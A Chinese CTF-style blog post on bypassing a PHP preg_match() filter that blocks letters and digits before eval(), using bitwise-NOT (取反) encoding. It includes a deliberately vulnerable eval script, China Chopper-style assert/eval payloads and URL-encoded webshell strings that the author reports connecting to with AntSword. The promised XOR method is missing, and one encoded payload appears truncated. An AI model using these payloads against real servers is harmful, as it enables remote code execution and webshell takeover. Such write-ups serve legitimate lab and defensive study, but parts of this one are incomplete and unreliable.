取反、异或绕过preg_match()过滤所有字母数字

捞到代码,在本地搭建,源码(rce.PHP):

 <?PHP
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

?>

在研究bypass之前,先研究一个问题:eval(变量)

 

test.PHP:

<?PHP
$a=$_REQUEST[8];
@eval(8);
?>

想通过传参让页面输出PHPinfo的界面,第一种方法就是?8=PHPinfo();  ps:记得加分号

我尝试了以下?8=$_REQUEST[6];&6=PHPinfo() 是不行的,在网上看过一篇WP说eval是PHP的语法组成的一员,所以eval()括号里一定是一个PHP预定义语法,不能直接是一个变量,说明eval(变量)的时候,变量不能直接写$_REQUEST[8]

而是要写成菜刀流量的形式:

?8=assert(eval($_REQUEST[8]))&8=PHPinfo();                  ?8=assert(eval(PHPinfo();))

assert()执行单行代码,eval()就是单行代码,经测试payload这样写是可行的。

 

继续看bypass问题:

法一:取反绕过:

<?PHP
echo urlencode(~'assert');
echo urlencode(~'eval($_REQUEST[8])');?>

结果:
%9E%8C%8C%9A%8D%8B
%9A%89%9E%93%D7%DB%A0%AD%BA%AE%AA%BA%AC%AB%A4%C7%A2%D

试了一下,连接蚁剑是可以的,但是我的蚁剑访问不了远程仓库不知道是什么情况。

 

法2:异或绕过

 

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...